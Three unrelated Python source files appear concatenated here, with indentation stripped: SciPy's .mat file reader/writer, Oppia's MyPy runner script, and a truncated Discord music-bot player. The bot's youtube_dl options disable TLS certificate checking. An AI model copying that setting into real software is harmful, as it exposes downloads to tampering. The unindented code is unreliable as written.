Module for reading and writing matlab (TM) .mat files
"""
# Authors: Travis Oliphant, Matthew Brett
from __future__ import division, print_function, absolute_import
import os
import sys
import warnings
from scipy.lib.six import string_types
from .miobase import get_matfile_version, docfiller
from .mio4 import MatFile4Reader, MatFile4Writer
from .mio5 import MatFile5Reader, MatFile5Writer
__all__ = ['find_mat_file', 'mat_reader_factory', 'loadmat', 'savemat',
'whosmat']
@docfiller
def find_mat_file(file_name, appendmat=True):
''' Try to find .mat file on system path
Parameters
----------
file_name : str
file name for mat file
%(append_arg)s
Returns
-------
full_name : string
possibly modified name after path search
'''
warnings.warn('Searching for mat files on python system path will be ' +
'removed in next version of scipy',
DeprecationWarning, stacklevel=2)
if appendmat and file_name.endswith(".mat"):
file_name = file_name[:-4]
if os.sep in file_name:
full_name = file_name
if appendmat:
full_name = file_name + ".mat"
else:
full_name = None
junk, file_name = os.path.split(file_name)
for path in [os.curdir] + list(sys.path):
test_name = os.path.join(path, file_name)
if appendmat:
test_name += ".mat"
try:
fid = open(test_name,'rb')
fid.close()
full_name = test_name
break
except IOError:
pass
return full_name
def _open_file(file_like, appendmat):
''' Open `file_like` and return as file-like object '''
if isinstance(file_like, string_types):
try:
return open(file_like, 'rb')
except IOError:
pass
if appendmat and not file_like.endswith('.mat'):
try:
return open(file_like + '.mat', 'rb')
except IOError:
pass
# search the python path - we'll remove this soon
full_name = find_mat_file(file_like, appendmat)
if full_name is None:
raise IOError("%s not found on the path."
% file_like)
return open(full_name, 'rb')
# not a string - maybe file-like object
try:
file_like.read(0)
except AttributeError:
raise IOError('Reader needs file name or open file-like object')
return file_like
@docfiller
def mat_reader_factory(file_name, appendmat=True, **kwargs):
"""Create reader for matlab .mat format files
Parameters
----------
%(file_arg)s
%(append_arg)s
%(load_args)s
%(struct_arg)s
Returns
-------
matreader : MatFileReader object
Initialized instance of MatFileReader class matching the mat file
type detected in `filename`.
"""
byte_stream = _open_file(file_name, appendmat)
mjv, mnv = get_matfile_version(byte_stream)
if mjv == 0:
return MatFile4Reader(byte_stream, **kwargs)
elif mjv == 1:
return MatFile5Reader(byte_stream, **kwargs)
elif mjv == 2:
raise NotImplementedError('Please use HDF reader for matlab v7.3 files')
else:
raise TypeError('Did not recognize version %s' % mjv)
@docfiller
def loadmat(file_name, mdict=None, appendmat=True, **kwargs):
"""
Load MATLAB file
Parameters
----------
file_name : str
Name of the mat file (do not need .mat extension if
appendmat==True) Can also pass open file-like object.
m_dict : dict, optional
Dictionary in which to insert matfile variables.
appendmat : bool, optional
True to append the .mat extension to the end of the given
filename, if not already present.
byte_order : str or None, optional
None by default, implying byte order guessed from mat
file. Otherwise can be one of ('native', '=', 'little', '<',
'BIG', '>').
mat_dtype : bool, optional
If True, return arrays in same dtype as would be loaded into
MATLAB (instead of the dtype with which they are saved).
squeeze_me : bool, optional
Whether to squeeze unit matrix dimensions or not.
chars_as_strings : bool, optional
Whether to convert char arrays to string arrays.
matlab_compatible : bool, optional
Returns matrices as would be loaded by MATLAB (implies
squeeze_me=False, chars_as_strings=False, mat_dtype=True,
struct_as_record=True).
struct_as_record : bool, optional
Whether to load MATLAB structs as numpy record arrays, or as
old-style numpy arrays with dtype=object. Setting this flag to
False replicates the behavior of scipy version 0.7.x (returning
numpy object arrays). The default setting is True, because it
allows easier round-trip load and save of MATLAB files.
variable_names : None or sequence
If None (the default) - read all variables in file. Otherwise
`variable_names` should be a sequence of strings, giving names of the
matlab variables to read from the file. The reader will skip any
variable with a name not in this sequence, possibly saving some read
processing.
Returns
-------
mat_dict : dict
dictionary with variable names as keys, and loaded matrices as
values
Notes
-----
v4 (Level 1.0), v6 and v7 to 7.2 matfiles are supported.
You will need an HDF5 python library to read matlab 7.3 format mat
files. Because scipy does not supply one, we do not implement the
HDF5 / 7.3 interface here.
"""
variable_names = kwargs.pop('variable_names', None)
MR = mat_reader_factory(file_name, appendmat, **kwargs)
matfile_dict = MR.get_variables(variable_names)
if mdict is not None:
mdict.update(matfile_dict)
else:
mdict = matfile_dict
if isinstance(file_name, string_types):
MR.mat_stream.close()
return mdict
@docfiller
def savemat(file_name, mdict,
appendmat=True,
format='5',
long_field_names=False,
do_compression=False,
oned_as=None):
"""
Save a dictionary of names and arrays into a MATLAB-style .mat file.
This saves the array objects in the given dictionary to a MATLAB-
style .mat file.
Parameters
----------
file_name : str or file-like object
Name of the .mat file (.mat extension not needed if ``appendmat ==
True``).
Can also pass open file_like object.
mdict : dict
Dictionary from which to save matfile variables.
appendmat : bool, optional
True (the default) to append the .mat extension to the end of the
given filename, if not already present.
format : {'5', '4'}, string, optional
'5' (the default) for MATLAB 5 and up (to 7.2),
'4' for MATLAB 4 .mat files
long_field_names : bool, optional
False (the default) - maximum field name length in a structure is
31 characters which is the documented maximum length.
True - maximum field name length in a structure is 63 characters
which works for MATLAB 7.6+
do_compression : bool, optional
Whether or not to compress matrices on write. Default is False.
oned_as : {'column', 'row', None}, optional
If 'column', write 1-D numpy arrays as column vectors.
If 'row', write 1-D numpy arrays as row vectors.
If None (the default), the behavior depends on the value of `format`
(see Notes below).
See also
--------
mio4.MatFile4Writer
mio5.MatFile5Writer
Notes
-----
If ``format == '4'``, `mio4.MatFile4Writer` is called, which sets
`oned_as` to 'row' if it had been None. If ``format == '5'``,
`mio5.MatFile5Writer` is called, which sets `oned_as` to 'column' if
it had been None, but first it executes:
``warnings.warn("Using oned_as default value ('column')" +``
``" This will change to 'row' in future versions",``
``FutureWarning, stacklevel=2)``
without being more specific as to precisely when the change will take
place.
"""
file_is_string = isinstance(file_name, string_types)
if file_is_string:
if appendmat and file_name[-4:] != ".mat":
file_name = file_name + ".mat"
file_stream = open(file_name, 'wb')
else:
try:
file_name.write(b'')
except AttributeError:
raise IOError('Writer needs file name or writeable '
'file-like object')
file_stream = file_name
if format == '4':
if long_field_names:
raise ValueError("Long field names are not available for version 4 files")
MW = MatFile4Writer(file_stream, oned_as)
elif format == '5':
MW = MatFile5Writer(file_stream,
do_compression=do_compression,
unicode_strings=True,
long_field_names=long_field_names,
oned_as=oned_as)
else:
raise ValueError("Format should be '4' or '5'")
MW.put_variables(mdict)
if file_is_string:
file_stream.close()
@docfiller
def whosmat(file_name, appendmat=True, **kwargs):
"""
List variables inside a MATLAB file
.. versionadded:: 0.12.0
Parameters
----------
%(file_arg)s
%(append_arg)s
%(load_args)s
%(struct_arg)s
Returns
-------
variables : list of tuples
A list of tuples, where each tuple holds the matrix name (a string),
its shape (tuple of ints), and its data class (a string).
Possible data classes are: int8, uint8, int16, uint16, int32, uint32,
int64, uint64, single, double, cell, struct, object, char, sparse,
function, opaque, unknown.
Notes
-----
v4 (Level 1.0), v6 and v7 to 7.2 matfiles are supported.
You will need an HDF5 python library to read matlab 7.3 format mat
files. Because scipy does not supply one, we do not implement the
HDF5 / 7.3 interface here.
"""
ML = mat_reader_factory(file_name, **kwargs)
variables = ML.list_variables()
if isinstance(file_name, string_types):
ML.mat_stream.close()
return variables
|
|
# coding: utf-8
#
# Copyright 2021 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MyPy test runner script."""
from __future__ import annotations
import argparse
import os
import site
import subprocess
import sys
from scripts import common
from scripts import install_third_party_libs
# List of directories whose files won't be type-annotated ever.
EXCLUDED_DIRECTORIES = [
'proto_files/',
'scripts/linters/test_files/',
'third_party/',
'venv/'
]
# List of files who should be type-annotated but are not.
NOT_FULLY_COVERED_FILES = [
'core/controllers/',
'core/domain/action_registry.py',
'core/domain/action_registry_test.py',
'core/domain/activity_jobs_one_off.py',
'core/domain/activity_jobs_one_off_test.py',
'core/domain/activity_services.py',
'core/domain/activity_services_test.py',
'core/domain/activity_validators.py',
'core/domain/activity_validators_test.py',
'core/domain/app_feedback_report_validators.py',
'core/domain/app_feedback_report_validators_test.py',
'core/domain/audit_validators.py',
'core/domain/audit_validators_test.py',
'core/domain/auth_jobs_one_off.py',
'core/domain/auth_jobs_one_off_test.py',
'core/domain/auth_services.py',
'core/domain/auth_services_test.py',
'core/domain/auth_validators.py',
'core/domain/auth_validators_test.py',
'core/domain/base_model_validators.py',
'core/domain/base_model_validators_test.py',
'core/domain/beam_job_validators.py',
'core/domain/beam_job_validators_test.py',
'core/domain/blog_services.py',
'core/domain/blog_services_test.py',
'core/domain/blog_validators.py',
'core/domain/blog_validators_test.py',
'core/domain/caching_services.py',
'core/domain/caching_services_test.py',
'core/domain/calculation_registry.py',
'core/domain/calculation_registry_test.py',
'core/domain/change_domain.py',
'core/domain/classifier_services.py',
'core/domain/classifier_services_test.py',
'core/domain/classifier_validators.py',
'core/domain/classifier_validators_test.py',
'core/domain/classroom_services.py',
'core/domain/classroom_services_test.py',
'core/domain/collection_domain.py',
'core/domain/collection_domain_test.py',
'core/domain/collection_jobs_one_off.py',
'core/domain/collection_jobs_one_off_test.py',
'core/domain/collection_services.py',
'core/domain/collection_services_test.py',
'core/domain/collection_validators.py',
'core/domain/collection_validators_test.py',
'core/domain/config_domain.py',
'core/domain/config_domain_test.py',
'core/domain/config_services.py',
'core/domain/config_services_test.py',
'core/domain/config_validators.py',
'core/domain/config_validators_test.py',
'core/domain/cron_services.py',
'core/domain/customization_args_util.py',
'core/domain/customization_args_util_test.py',
'core/domain/draft_upgrade_services.py',
'core/domain/draft_upgrade_services_test.py',
'core/domain/email_jobs_one_off.py',
'core/domain/email_jobs_one_off_test.py',
'core/domain/email_manager.py',
'core/domain/email_manager_test.py',
'core/domain/email_services.py',
'core/domain/email_services_test.py',
'core/domain/email_subscription_services.py',
'core/domain/email_subscription_services_test.py',
'core/domain/email_validators.py',
'core/domain/email_validators_test.py',
'core/domain/event_services.py',
'core/domain/event_services_test.py',
'core/domain/exp_domain.py',
'core/domain/exp_domain_test.py',
'core/domain/exp_fetchers.py',
'core/domain/exp_fetchers_test.py',
'core/domain/exp_jobs_one_off.py',
'core/domain/exp_jobs_one_off_test.py',
'core/domain/exp_services.py',
'core/domain/exp_services_test.py',
'core/domain/exploration_validators.py',
'core/domain/exploration_validators_test.py',
'core/domain/expression_parser.py',
'core/domain/expression_parser_test.py',
'core/domain/feedback_jobs_one_off.py',
'core/domain/feedback_jobs_one_off_test.py',
'core/domain/feedback_services.py',
'core/domain/feedback_services_test.py',
'core/domain/feedback_validators.py',
'core/domain/feedback_validators_test.py',
'core/domain/fs_domain.py',
'core/domain/fs_domain_test.py',
'core/domain/fs_services.py',
'core/domain/fs_services_test.py',
'core/domain/html_cleaner.py',
'core/domain/html_cleaner_test.py',
'core/domain/html_validation_service.py',
'core/domain/html_validation_service_test.py',
'core/domain/image_services.py',
'core/domain/image_services_test.py',
'core/domain/image_validation_services.py',
'core/domain/image_validation_services_test.py',
'core/domain/improvements_services.py',
'core/domain/improvements_services_test.py',
'core/domain/improvements_validators.py',
'core/domain/improvements_validators_test.py',
'core/domain/interaction_jobs_one_off.py',
'core/domain/interaction_jobs_one_off_test.py',
'core/domain/interaction_registry.py',
'core/domain/interaction_registry_test.py',
'core/domain/job_validators.py',
'core/domain/job_validators_test.py',
'core/domain/learner_goals_services.py',
'core/domain/learner_goals_services_test.py',
'core/domain/learner_playlist_services.py',
'core/domain/learner_playlist_services_test.py',
'core/domain/learner_progress_services.py',
'core/domain/learner_progress_services_test.py',
'core/domain/moderator_services.py',
'core/domain/moderator_services_test.py',
'core/domain/object_registry.py',
'core/domain/object_registry_test.py',
'core/domain/opportunity_jobs_one_off.py',
'core/domain/opportunity_jobs_one_off_test.py',
'core/domain/opportunity_services.py',
'core/domain/opportunity_services_test.py',
'core/domain/opportunity_validators.py',
'core/domain/opportunity_validators_test.py',
'core/domain/param_domain.py',
'core/domain/param_domain_test.py',
'core/domain/platform_feature_services.py',
'core/domain/platform_feature_services_test.py',
'core/domain/platform_parameter_domain.py',
'core/domain/platform_parameter_domain_test.py',
'core/domain/platform_parameter_list.py',
'core/domain/platform_parameter_list_test.py',
'core/domain/platform_parameter_registry.py',
'core/domain/platform_parameter_registry_test.py',
'core/domain/playthrough_issue_registry.py',
'core/domain/playthrough_issue_registry_test.py',
'core/domain/prod_validation_jobs_one_off.py',
'core/domain/question_domain.py',
'core/domain/question_domain_test.py',
'core/domain/question_fetchers.py',
'core/domain/question_fetchers_test.py',
'core/domain/question_jobs_one_off.py',
'core/domain/question_jobs_one_off_test.py',
'core/domain/question_services.py',
'core/domain/question_services_test.py',
'core/domain/question_validators.py',
'core/domain/question_validators_test.py',
'core/domain/rating_services.py',
'core/domain/rating_services_test.py',
'core/domain/recommendations_jobs_one_off.py',
'core/domain/recommendations_jobs_one_off_test.py',
'core/domain/recommendations_services.py',
'core/domain/recommendations_services_test.py',
'core/domain/recommendations_validators.py',
'core/domain/recommendations_validators_test.py',
'core/domain/rights_manager.py',
'core/domain/rights_manager_test.py',
'core/domain/role_services.py',
'core/domain/role_services_test.py',
'core/domain/rte_component_registry.py',
'core/domain/rte_component_registry_test.py',
'core/domain/rules_registry.py',
'core/domain/rules_registry_test.py',
'core/domain/search_services.py',
'core/domain/search_services_test.py',
'core/domain/skill_domain.py',
'core/domain/skill_domain_test.py',
'core/domain/skill_fetchers.py',
'core/domain/skill_fetchers_test.py',
'core/domain/skill_jobs_one_off.py',
'core/domain/skill_jobs_one_off_test.py',
'core/domain/skill_services.py',
'core/domain/skill_services_test.py',
'core/domain/skill_validators.py',
'core/domain/skill_validators_test.py',
'core/domain/state_domain.py',
'core/domain/state_domain_test.py',
'core/domain/statistics_validators.py',
'core/domain/statistics_validators_test.py',
'core/domain/stats_domain.py',
'core/domain/stats_domain_test.py',
'core/domain/stats_jobs_continuous.py',
'core/domain/stats_jobs_continuous_test.py',
'core/domain/stats_jobs_one_off.py',
'core/domain/stats_jobs_one_off_test.py',
'core/domain/stats_services.py',
'core/domain/stats_services_test.py',
'core/domain/storage_model_audit_jobs_test.py',
'core/domain/story_domain.py',
'core/domain/story_domain_test.py',
'core/domain/story_fetchers.py',
'core/domain/story_fetchers_test.py',
'core/domain/story_jobs_one_off.py',
'core/domain/story_jobs_one_off_test.py',
'core/domain/story_services.py',
'core/domain/story_services_test.py',
'core/domain/story_validators.py',
'core/domain/story_validators_test.py',
'core/domain/subscription_services.py',
'core/domain/subscription_services_test.py',
'core/domain/subtopic_page_domain.py',
'core/domain/subtopic_page_domain_test.py',
'core/domain/subtopic_page_services.py',
'core/domain/subtopic_page_services_test.py',
'core/domain/subtopic_validators.py',
'core/domain/subtopic_validators_test.py',
'core/domain/suggestion_jobs_one_off.py',
'core/domain/suggestion_jobs_one_off_test.py',
'core/domain/suggestion_registry.py',
'core/domain/suggestion_registry_test.py',
'core/domain/suggestion_services.py',
'core/domain/suggestion_services_test.py',
'core/domain/suggestion_validators.py',
'core/domain/suggestion_validators_test.py',
'core/domain/summary_services.py',
'core/domain/summary_services_test.py',
'core/domain/takeout_service.py',
'core/domain/takeout_service_test.py',
'core/domain/taskqueue_services.py',
'core/domain/taskqueue_services_test.py',
'core/domain/topic_domain.py',
'core/domain/topic_domain_test.py',
'core/domain/topic_fetchers.py',
'core/domain/topic_fetchers_test.py',
'core/domain/topic_jobs_one_off.py',
'core/domain/topic_jobs_one_off_test.py',
'core/domain/topic_services.py',
'core/domain/topic_services_test.py',
'core/domain/topic_validators.py',
'core/domain/topic_validators_test.py',
'core/domain/translatable_object_registry.py',
'core/domain/translatable_object_registry_test.py',
'core/domain/translation_fetchers.py',
'core/domain/translation_fetchers_test.py',
'core/domain/translation_services.py',
'core/domain/translation_services_test.py',
'core/domain/translation_validators.py',
'core/domain/translation_validators_test.py',
'core/domain/user_domain.py',
'core/domain/user_domain_test.py',
'core/domain/user_jobs_one_off.py',
'core/domain/user_jobs_one_off_test.py',
'core/domain/user_query_domain.py',
'core/domain/user_query_domain_test.py',
'core/domain/user_query_jobs_one_off.py',
'core/domain/user_query_jobs_one_off_test.py',
'core/domain/user_query_services.py',
'core/domain/user_query_services_test.py',
'core/domain/user_services.py',
'core/domain/user_services_test.py',
'core/domain/user_validators.py',
'core/domain/user_validators_test.py',
'core/domain/visualization_registry.py',
'core/domain/visualization_registry_test.py',
'core/domain/voiceover_services.py',
'core/domain/voiceover_services_test.py',
'core/domain/wipeout_jobs_one_off.py',
'core/domain/wipeout_jobs_one_off_test.py',
'core/domain/wipeout_service.py',
'core/domain/wipeout_service_test.py',
'core/platform/storage/cloud_storage_emulator.py',
'core/platform/storage/cloud_storage_emulator_test.py',
'core/platform_feature_list.py',
'core/platform_feature_list_test.py',
'core/storage/beam_job/gae_models.py',
'core/storage/beam_job/gae_models_test.py',
'core/storage/blog/gae_models.py',
'core/storage/blog/gae_models_test.py',
'core/storage/storage_models_test.py',
'core/tests/build_sources/extensions/CodeRepl.py',
'core/tests/build_sources/extensions/DragAndDropSortInput.py',
'core/tests/build_sources/extensions/base.py',
'core/tests/build_sources/extensions/base_test.py',
'core/tests/build_sources/extensions/models_test.py',
'core/tests/data/failing_tests.py',
'core/tests/data/image_constants.py',
'core/tests/data/unicode_and_str_handler.py',
'core/tests/gae_suite.py',
'core/tests/gae_suite_test.py',
'core/tests/load_tests/feedback_thread_summaries_test.py',
'core/tests/test_utils.py',
'core/tests/test_utils_test.py',
'core/jobs',
'core/python_utils.py',
'core/python_utils_test.py',
'extensions/',
'scripts/'
]
CONFIG_FILE_PATH = os.path.join('.', 'mypy.ini')
MYPY_REQUIREMENTS_FILE_PATH = os.path.join('.', 'mypy_requirements.txt')
MYPY_TOOLS_DIR = os.path.join(os.getcwd(), 'third_party', 'python3_libs')
PYTHON3_CMD = 'python3'
_PATHS_TO_INSERT = [MYPY_TOOLS_DIR, ]
_PARSER = argparse.ArgumentParser(
description='Python type checking using mypy script.'
)
_PARSER.add_argument(
'--skip-install',
help='If passed, skips installing dependencies.'
' By default, they are installed.',
action='store_true')
_PARSER.add_argument(
'--install-globally',
help='optional; if specified, installs mypy and its requirements globally.'
' By default, they are installed to %s' % MYPY_TOOLS_DIR,
action='store_true')
_PARSER.add_argument(
'--files',
help='Files to type-check',
action='store',
nargs='+'
)
def install_third_party_libraries(skip_install: bool) -> None:
"""Run the installation script.
Args:
skip_install: bool. Whether to skip running the installation script.
"""
if not skip_install:
install_third_party_libs.main()
def get_mypy_cmd(files, mypy_exec_path, using_global_mypy):
"""Return the appropriate command to be run.
Args:
files: list(list(str)). List having first element as list of string.
mypy_exec_path: str. Path of mypy executable.
using_global_mypy: bool. Whether generated command should run using
global mypy.
Returns:
list(str). List of command line arguments.
"""
if using_global_mypy:
mypy_cmd = 'mypy'
else:
mypy_cmd = mypy_exec_path
if files:
cmd = [mypy_cmd, '--config-file', CONFIG_FILE_PATH] + files
else:
excluded_files_regex = (
'|'.join(NOT_FULLY_COVERED_FILES + EXCLUDED_DIRECTORIES))
cmd = [
mypy_cmd, '--exclude', excluded_files_regex,
'--config-file', CONFIG_FILE_PATH, '.'
]
return cmd
def install_mypy_prerequisites(install_globally):
"""Install mypy and type stubs from mypy_requirements.txt.
Args:
install_globally: bool. Whether mypy and its requirements are to be
installed globally.
Returns:
tuple(int, str). The return code from installing prerequisites and the
path of the mypy executable.
"""
# TODO(#13398): Change MyPy installation after Python3 migration. Now, we
# install packages globally for CI. In CI, pip installation is not in a way
# we expect.
if install_globally:
cmd = [
PYTHON3_CMD, '-m', 'pip', 'install', '-r',
MYPY_REQUIREMENTS_FILE_PATH
]
else:
cmd = [
PYTHON3_CMD, '-m', 'pip', 'install', '-r',
MYPY_REQUIREMENTS_FILE_PATH, '--target', MYPY_TOOLS_DIR,
'--upgrade'
]
process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.communicate()
if b'can\'t combine user with prefix' in output[1]:
uextention_text = ['--user', '--prefix=', '--system']
new_process = subprocess.Popen(
cmd + uextention_text, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
new_process.communicate()
_PATHS_TO_INSERT.append(os.path.join(site.USER_BASE, 'bin'))
mypy_exec_path = os.path.join(site.USER_BASE, 'bin', 'mypy')
return (new_process.returncode, mypy_exec_path)
else:
_PATHS_TO_INSERT.append(os.path.join(MYPY_TOOLS_DIR, 'bin'))
mypy_exec_path = os.path.join(MYPY_TOOLS_DIR, 'bin', 'mypy')
return (process.returncode, mypy_exec_path)
def main(args=None):
"""Runs the MyPy type checks."""
parsed_args = _PARSER.parse_args(args=args)
for directory in common.DIRS_TO_ADD_TO_SYS_PATH:
# The directories should only be inserted starting at index 1. See
# https://stackoverflow.com/a/10095099 and
# https://stackoverflow.com/q/10095037 for more details.
sys.path.insert(1, directory)
install_third_party_libraries(parsed_args.skip_install)
common.fix_third_party_imports()
print('Installing Mypy and stubs for third party libraries.')
return_code, mypy_exec_path = install_mypy_prerequisites(
parsed_args.install_globally)
if return_code != 0:
print('Cannot install Mypy and stubs for third party libraries.')
sys.exit(1)
print('Installed Mypy and stubs for third party libraries.')
print('Starting Mypy type checks.')
cmd = get_mypy_cmd(
parsed_args.files, mypy_exec_path, parsed_args.install_globally)
env = os.environ.copy()
for path in _PATHS_TO_INSERT:
env['PATH'] = '%s%s' % (path, os.pathsep) + env['PATH']
env['PYTHONPATH'] = MYPY_TOOLS_DIR
process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
# Standard and error output is in bytes, we need to decode the line to
# print it.
print(stdout.decode('utf-8'))
print(stderr.decode('utf-8'))
if process.returncode == 0:
print('Mypy type checks successful.')
else:
print(
'Mypy type checks unsuccessful. Please fix the errors. '
'For more information, visit: '
'https://github.com/oppia/oppia/wiki/Backend-Type-Annotations')
sys.exit(2)
return process.returncode
if __name__ == '__main__': # pragma: no cover
main()
|
|
import os, errno, glob
import discord
import asyncio
from discord.ext import commands
import random
import youtube_dl
import functools
import datetime
import traceback
import subprocess
from concurrent.futures import ThreadPoolExecutor
from shutil import rmtree
from collections import deque
from itertools import islice
from BB.conf import Conf
from BB.permissions import *
#i am not original so a lot of this is at least remotely based from the example playlist.py and possibly MusicBot, but what are you gonna do
#everything cant be original
# im sorry so much of this is a copy paste or close rip of MusicBot's downloader.py
# with the changes to discord.py rewrite, i couldnt think of a better way to get remote audio
# but anyways heres a way to bass boost something because why not
# ffmpeg -i "filename..." -af bass=g=999 "outputname"
ytdl_options = {
'format': 'bestaudio/best',
'extractaudio': True,
'audioformat': 'mp3',
#'outtmpl': '%(id)s-%(title)s.%(ext)s',
'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
'restrictfilenames': True,
'noplaylist': True,
'nocheckcertificate': True,
'ignoreerrors': False,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0'
}
youtube_dl.utils.bug_reports_message = lambda: ''
# needs to be manually filled in maybe if it fails
# find the name of the opus library installed
if not discord.opus.is_loaded():
discord.opus.load_opus()
class Player: #this represents commands and not an actual player/voicechan object
def __init__(self, bot, config, loop, mainbot):
self.bot = bot #commands related for making this all disorganized
self.config = config
self.loop = loop
self.BarryBot = mainbot #contains the Downloader and mainly everything
self.players = {} #format: self.players[serverID] = (channelplayer, playlist); playlist contains message/chan/vc/self etc
try:
rmtree(config.download_path)
except:
pass
@commands.command(aliases=["join", "come"])
async def summon(self, ctx):
'''Bring the bot into a voice channel
Server mods are allowed to use this command during music play.'''
if not ctx.author.voice:
raise impossible_noChannel
if ctx.guild.id in self.players:
try:
is_mod = Perms.is_guild_mod(ctx)
except:
is_mod = False
if self.players[ctx.guild.id][0].is_playing() and not is_mod:
raise currentlyPlaying
if ctx.author.voice.channel.id != self.players[ctx.guild.id][0].channel.id:
await self.players[ctx.guild.id][0].move_to(ctx.author.voice.channel)
self.players[ctx.guild.id][1].voice_channel = ctx.author.voice.channel
return
else:
raise alreadyJoined
try:
player = await ctx.author.voice.channel.connect()
except ClientException:
await ctx.send("It seems I'm in the channel but I can't see for sure. Let me refresh...", delete_after=15)
try:
del self.players[ctx.guild.id]
except:
pass
player = await ctx.author.voice.channel.connect()
self.players[ctx.guild.id] = (player, Playlist(self.BarryBot, ctx.channel, None, ctx.author.voice.channel, self, ctx))
return
self.players[ctx.guild.id] = (player, Playlist(self.BarryBot, ctx.channel, None, ctx.author.voice.channel, self, ctx))
@commands.command(aliases=["kys", "leave"])
@commands.check(Perms.is_guild_mod)
async def disconnect(self, ctx):
'''Make the bot leave the voice channel, killing the player
Only server mods can use this.'''
if ctx.guild.id not in self.players:
raise alreadyLeft
player = self.players[ctx.guild.id][0]
await player.disconnect()
del self.players[ctx.guild.id]
@commands.command()
async def play(self, ctx, *, url : str):
'''Queue an item on the music player
If I am not in a channel, I will join yours.
If I am not in your voice channel, I will move if I'm not playing music.
Bonus: Adding the -b flag just after the command and before the search terms or link will give an obnoxious bass boost to the song.
Example: !play -b poop'''
try:
is_mod = Perms.is_guild_mod(ctx)
except:
is_mod = False
if not ctx.author.voice:
if not is_mod:
raise noChannel
else:
pass
if ctx.guild.id not in self.players and ctx.author.voice:
await self.summon.invoke(ctx)
elif ctx.guild.id not in self.players and not ctx.author.voice:
raise modBypassAttempt
else:
if ctx.author.voice:
if ctx.author.voice.channel.id != self.players[ctx.guild.id][1].voice_channel.id and ctx.author.voice.channel.id != self.players[ctx.guild.id][0].channel.id:
if not is_mod:
if self.players[ctx.guild.id][0].is_playing():
raise outsideChannel
else:
await self.summon.invoke(ctx)
else:
if self.players[ctx.guild.id][0].is_playing():
pass
else:
await self.summon.invoke(ctx)
#basically this is a bunch of bypasses and permission checking
change_later = await ctx.send("Looking...")
try:
info = await self.BarryBot.downloader.get_the_stuff(self.players[ctx.guild.id][1].loop, url, download=False, process=False)
except:
await change_later.delete()
raise entryFailure
if not info:
await change_later.delete()
raise entryFailure
bassboost = False
if url.split()[0].lower() == "-b":
if len(url.split()) == 1:
raise specific_error("You did not specify a search term or link to use after the Bass Boost flag.")
bassboost = True
url = " ".join(url.split()[1:])
if info.get('url', '').startswith('ytsearch'):
info = await self.BarryBot.downloader.get_the_stuff(
self.players[ctx.guild.id][1].loop,
url,
download=False,
process=True,
)
if not info:
await change_later.delete()
raise entryFailure
url = info['entries'][0]['webpage_url']
info = await self.BarryBot.downloader.get_the_stuff(self.players[ctx.guild.id][1].loop, url, download=False, process=False)
try:
self.players[ctx.guild.id][1].waitingTask.cancel()
except:
pass
if 'entries' in info:
#basically this would start a loop to queue each song from the list or something
await change_later.delete()
raise unsupportedPlaylist
else:
#check length of song and error if too long
if info.get('duration',0) > 10800:
await change_later.delete()
raise songTooLong
try:
entry, position = await self.players[ctx.guild.id][1].add_entry(url, queuer=ctx.author, bass=bassboost)
except:
await change_later.delete()
raise entryFailure
sendMessage = "Found and queued **%s** at position %s in the queue"
title = entry.name
self.players[ctx.guild.id][1].chan = ctx.channel
try:
self.players[ctx.guild.id][1].waitingTask.cancel()
except:
pass
if position == 1 and not self.players[ctx.guild.id][0].is_playing():
#make the player play the song and pretty much dont even need to queue it
sendMessage = "Found and queued **%s** to play as soon as possible!"
sendMessage %= title
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
self.players[ctx.guild.id][1].temp_message = change_later
cur_entr = self.players[ctx.guild.id][1].current_entry()
await self.players[ctx.guild.id][1].entries[0].download()
if cur_entr.skipped:
return
self.players[ctx.guild.id][1].message = await self.players[ctx.guild.id][1].chan.send("Now playing in "+self.players[ctx.guild.id][0].channel.name+": "+str(self.players[ctx.guild.id][1].entries[0]))
await self.players[ctx.guild.id][1].entries[0].play(self.players[ctx.guild.id][0])
else:
#just add the queue and download it but dont do anything else
try:
time_to = await self.players[ctx.guild.id][1].time_to(position)
sendMessage += " - Rough estimation for when it will play: %s"
except:
time_to = "Error"
try:
sendMessage %= (title, position, time_to)
except:
sendMessage = "There was an error creating the final string, but "+title+" should have been queued anyways."
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
if position == 2:
await self.players[ctx.guild.id][1].entries[1].download()
#await ctx.send(sendMessage, delete_after=30)
@commands.command(aliases=["vol"])
async def volume(self, ctx, *, vol : float = 0.050305):
'''Change the music player volume
The player default is 30%.
You can only change the volume by 30% at a time.
Server mods can bypass the change restriction.
The max volume is 200.'''
if ctx.guild.id not in self.players:
raise alreadyLeft
try:
is_mod = Perms.is_guild_mod(ctx)
except:
is_mod = False
vol = vol/100
if vol*100 == 0.050305:
return await ctx.send("The current volume is at "+str(self.players[ctx.guild.id][1].volume * 100)+"%.", delete_after=15)
if abs(self.players[ctx.guild.id][1].volume - vol) > 0.3 and not is_mod:
raise drasticChange
if vol*100 > 200 or vol*100 < 1:
raise volOutOfBounds
if self.players[ctx.guild.id][0].is_playing():
self.players[ctx.guild.id][0].source.volume = vol
self.players[ctx.guild.id][1].volume = vol
await ctx.send("The volume has been changed to "+str(vol*100)+"%.", delete_after=15)
@commands.command(aliases=["queue", "que", "list"])
async def playlist(self, ctx):
'''Show the playlist'''
#add extra checks for the player
if ctx.guild.id not in self.players:
raise alreadyLeft
if len(self.players[ctx.guild.id][1].entries) == 0:
return await ctx.send("There are no entries in the playlist!", delete_after=15)
finalStr = ""
entries = self.players[ctx.guild.id][1].entries
overLimit = 0
for i in range(len(entries)):
if len(finalStr) > 1900:
overLimit += 1
if i == 0 and not overLimit:
finalStr = "Currently Playing: "+str(entries[i])
elif i == 1 and not overLimit:
